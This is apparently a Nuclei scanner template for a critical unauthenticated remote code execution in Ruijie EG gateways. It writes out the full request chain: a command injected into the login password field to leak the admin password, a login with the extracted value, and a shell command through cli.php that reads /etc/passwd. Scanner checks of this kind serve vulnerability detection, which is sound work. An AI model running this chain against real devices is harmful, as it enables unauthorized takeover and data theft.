nuclei-templates/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml

59 lines
1.9 KiB
YAML
Raw Normal View History

2021-08-06 10:04:32 +00:00
id: ruijie-eg-rce
info:
name: Ruijie EG - Remote Code Execution
2021-08-06 10:04:32 +00:00
author: pikpikcu
severity: critical
description: Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
reference:
2021-10-25 06:57:47 +00:00
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score: 10
cwe-id: CWE-77
metadata:
max-request: 3
2023-10-14 11:27:55 +00:00
tags: ruijie,rce
2021-08-06 10:04:32 +00:00
http:
2021-08-06 10:04:32 +00:00
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password=admin?show+webmaster+user
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin&password={{admin}}
2021-08-06 10:04:32 +00:00
- |
POST /cli.php?a=shell HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
notdelay=true&command=cat /etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "nobody:.*:0:0"
2021-08-06 10:04:32 +00:00
part: body
- type: status
status:
- 200
extractors:
- type: regex
name: admin
group: 1
internal: true
regex:
- 'admin ([a-zA-Z0-9#@]+)",'
# digest: 490a00463044022061b3ed849fb79c2dc3f2432d2b5168b2addf5c51cdc4c1e8bbfecf007373c92102207518c42626017f1a00ea637d89dadd51d499d220f049150a0b049ce57bc497e7:922c64590222798bb761d5b6d8e72950